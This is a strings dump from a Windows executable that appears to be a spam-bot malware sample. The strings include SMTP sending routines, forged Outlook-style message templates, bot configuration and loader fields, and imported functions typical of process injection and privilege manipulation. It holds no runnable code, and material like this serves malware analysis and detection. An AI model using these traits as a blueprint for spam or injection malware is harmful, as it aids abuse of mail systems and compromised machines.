!This program cannot be run in DOS mode.
`.rdata
@.data
.reloc
L$$QSSSSSSSh
T$(RSSSj
D$ _^[3
Wjd_W3
D$,PUU
;H |(j
QQSUVWj
_^][YY
uw9V ~r
jdjdjdh
?[u.G@W
;HHu$V
+Y4;YPw,
9E|tV9
M|PPPPV
s]j(XS
urSUVW
r"SSSSh
PSSSSSSh
aaaah~
5aaaaY;E
vHWUVj
QQSVW3
ulSWjMh
SWj:hL
Y5aaaaP
5aaaaP
5aaaaP
j _WVh
SSSh^@@
tAOt%OuI
EpYY;x
F;uH~"
'9}\u"
9}0tI9}Xt
+AH+QLRP
Xj@Sh@5A
HHtEHt#HuM
PSSSSh
PSSSSh
~@WVhd
uyWVjFh8
T9G$u&
@YY_[^
mail.ru
google.com
yahoo.com
microsoft.com
GetBestInterface
GetIfEntry
GetAdaptersInfo
Iphlpapi.dll
123.45.67.89
GetAdaptersAddresses
%u.%u.%u.%u.%s
loader_id
born_date
net_type
start_srv
work_srv
flags_upd
localcfg
lid_file_upd
kernel32
IsWow64Process
rbl_ip
rbl_bl
DnsQuery_A
dnsapi.dll
GetNetworkParams
iphlpapi.dll
\\.\pipe\
%SYS_JR
%SYS_N
%SYS_RN
%RND_SPACE
%RND_char
qwertyuiopasdfghjklzxcvbnm
%RND_CHAR
QWERTYUIOPASDFGHJKLZXCVBNM
%RND_hex
0123456789abcdef
%RND_HEX
0123456789ABCDEF
%RND_DIGIT
0123456789
%RND_NUM
except_info
ret=%p
_ax=%p
_bx=%p
_cx=%p
_dx=%p
_si=%p
_di=%p
_bp=%p
_sp=%p
va=%08X%08X uef=%p
ver=%d date=%s %s
c=%08x a=%p
Jan 13 2018
12:08:32
GetSystemWow64DirectoryA
rresolv
plg_init
priority
=%X%08X
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Incorrect respons
Too small respons
Too big smtp respons (%d bytes)
Error sending command (sent = %d/%d)
rcpt to:<%s>
mail from:<%s>
AUTH LOGIN
helo %s
ehlo %s
mx connect error
LocalHost
%OUTLOOK_HST
%OUTLOOK_MID
%04x%08.8lx$%08.8lx$%08x@%s
----=_NextPart_%03d_%04X_%08.8lX.%08.8lX
%OUTLOOK_BND_
127.0.0.1
%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
%M5DATE
%P5DATE
%TO_HASH
%TO_USER
%TO_EMAIL
%TO_DOMAIN
%FROM_USER
%FROM_DOMAIN
%FROM_EMAIL
no locks and using MX is disabled
Time sending was exhausted
Too many errors in the block
INSERT_ORIGINAL_EMAIL
smtp_retr
smtp_ban
smtp_herr
Type = %d:
works = %d
cur_thr = %d
num_thr = %d
integr = %d
integr_nl = %d
fCntrl = %d
time_ok_filt = %d
cntr = %d
time_nl_filt = %d
last_time_work = %d
last_time_getem = %d
last_time_calc = %d
last_time_nl = %d
nl_cntr = %d
last_err = %d
errs = %d,%d,%d,%d,%d,%d,%d,%d,%d,%d
ID = %u:
lib = %d
ok = %d
err = %d
lis = %d
lok = %d
lerr = %d
cfg = %d
25 = %d
mac = %d
task = %d
ems = %d
local_time
drivers\
}srv_time
time_cfg
_allmul
_alldiv
-2147483648
ntdll.dll
RtlExpandEnvironmentStrings_U
RtlSetLastWin32Error
NtTerminateProcess
RtlFreeSid
RtlInitUnicodeString
NtSetInformationThread
NtSetInformationToken
RtlNtStatusToDosError
NtClose
NtOpenProcessToken
NtDuplicateToken
RtlAllocateAndInitializeSid
NtFilterToken
RtlLengthSid
NtQueryInformationToken
WS2_32.dll
StackWalk64
dbghelp.dll
FreeLibrary
HeapFree
HeapReAlloc
HeapAlloc
GetProcessHeap
GetProcAddress
LoadLibraryA
GetVolumeInformationA
GetComputerNameA
GetTickCount
GetCurrentProcess
GetModuleHandleA
GetSystemInfo
GetVersionExA
lstrcmpiA
lstrlenA
lstrcpynA
InterlockedExchange
GetCurrentThreadId
ExitProcess
GetOverlappedResult
WaitForSingleObject
GetLastError
WriteFile
ReadFile
CreateFileA
DisconnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CloseHandle
CreateEventA
GetEnvironmentVariableA
DeleteFileA
IsBadWritePtr
IsBadCodePtr
lstrcpyA
lstrcmpA
VirtualProtect
IsBadReadPtr
VirtualFree
WriteProcessMemory
VirtualAllocEx
VirtualAlloc
SetFilePointer
GetFileSize
SetFileAttributesA
GetDiskFreeSpaceA
GetWindowsDirectoryA
GetSystemDirectoryA
LocalFree
GetFileAttributesExA
LocalAlloc
CreateProcessA
GetTempPathA
SystemTimeToFileTime
GetSystemTime
DeviceIoControl
CreateFileW
GetModuleFileNameA
ResumeThread
SetThreadContext
TerminateProcess
GetThreadContext
lstrcatA
CreateThread
GetDriveTypeA
GetCommandLineA
SetUnhandledExceptionFilter
SetErrorMode
InterlockedIncrement
GetLocalTime
GetTimeZoneInformation
FileTimeToLocalFileTime
FileTimeToSystemTime
InterlockedDecrement
HeapSize
GetSystemTimeAsFileTime
MultiByteToWideChar
lstrlenW
GetStartupInfoW
KERNEL32.dll
wsprintfA
CharToOemA
USER32.dll
LookupAccountNameW
GetUserNameW
FreeSid
CheckTokenMembership
AllocateAndInitializeSid
ConvertSidToStringSidA
LookupAccountNameA
GetUserNameA
RegCloseKey
RegEnumValueA
RegOpenKeyExA
RegEnumKeyA
RegQueryValueExA
SetSecurityDescriptorDacl
DeleteAce
GetAce
GetSecurityDescriptorDacl
SetFileSecurityA
SetSecurityDescriptorOwner
InitializeSecurityDescriptor
EqualSid
GetSecurityDescriptorOwner
GetFileSecurityA
GetLengthSid
RegSetValueExA
RegSetKeySecurity
RegGetKeySecurity
RegDeleteValueA
SetServiceStatus
RegisterServiceCtrlHandlerA
StartServiceCtrlDispatcherA
RegCreateKeyExA
CreateProcessWithLogonW
ADVAPI32.dll
ShellExecuteA
ShellExecuteExW
SHELL32.dll
OLEAUT32.dll
0123456789ABCDEF
0%020;0D0M0V0_0h0q0z0
1$11161C1Q1V1c1q1v1
2'2,292B2G2T2^2c2p2
3"3O3a3h3
3$4O4p4
5 6$6)6/6K6\6k6
8O9V9e9
9 :8:\:
>&>+>?>_>m>
0"00060?0M0S0\0j0t0|0
1.1M1[1a1l1s1
7 70767<7D7V7`7l7v7
:*;L;l;
<'<R<Y<
=*=<=L=\=c=
>)>0>@>Q>
7V8e8l8
:%:g:s;
>$>F>Q>]>c>
?F?P?a?t?
#0.0H0r0
0#1,1\1n1{1
1U2a2l2
6#666I6c6i6
7&7+7;7@7M7R7n7
;S<m<z<
?(?B?R?j?
1U2W3-4B4O5
5,565;5H5^5q5z5
7)7.7W7
:8;B;J;P;[;g;q;y;
; <@<K<T<\<
= =-=7=D=T=z=
>&>/>W>
?&?7?@?E?X?|?
!01080
3Z4_4t4
718h8z8
9L:Z:k:{:
;=;[;l;
<)<B<h<
=5=:=L=V=f=t=
>#>)>2>@>T>^>g>r>x>~>
Q0e0j0
1G1L1a1o1
2'2/2;2Z2`2
4C4L4p4|4
5&515Z5u5
6.6h6~6
757B7^7d7
8(8]8w8
9(939>9H9O9V9c9j9t9{9
:$:.:8:B:L:V:`:j:t:~:
;!;+;5;?;I;S;];g;q;{;
<1<B<K<
>L>Q>a>
1$1/161a1h1v1
3 3B3p3w3
5(5L5_5s5
6'6X6^6g6u6
7#787E7X7a7
838P8]8u8}8
9(9-949Y9c9h9n9u9
9 :%:1:x:
>">*>:>a>q>
>(?=?`?l?
0 0:0S0`0t0
0"131v1}1
4&4<4N4c4
425`6|6
7+797h7t7
8I8V8_8m8
99:N:q:
;:;Q;U;Y;];a;e;i;m;q;u;y;};
>">J>Y>
[1i1!2(2/262=2D2K2R2Y2`2g2n2u2|2
2+3r3y3
3 424L4b4i4t4
5S6]6m6
6)747K7P7n7t7}7
;O<d<x<
< =J=P=^=
>!>%>)>->;>G>V>b>E?^?c?q?x?
091?1E1K1Q1W1]1g1q1{1
2!2+252?2E2J2P2U2[2a2g2m2s2y2
5&555;5@5Q5U5[5e5o5u5{5
6*6J6S6a6r6
707D7M7b7r7
8-8Q8l8
9)919>9J9W9\9m9t9
;e;r;x;
<*<u<z<
>(>K>P>b>k>p>
191W1s1
1 2$232:2~2
3(3`3e3t3{3
4*414B4]4
5I5_5n5y5
6?6E6K6Q6c6
8!8,8H8f8
9]9k9w9
9 :6:M:n:
;4;G;L;X;b;
;.<A<m<
="=(===N=U=[=c=k=s=z=
%0D0}0
0)1Z1c1
2 2o2t2
5"5Z5m5
7$7;7R7Z7
;#;B;K;V;
<C<J<`<t<z<
3O3i3w3
`2<4@4D4H4L4P4T4X4\4L5P5T5X5\5`5d5h5l5p5t5x5|5
n%systemroot%\system32\cmd.exe
wusa.exe
useless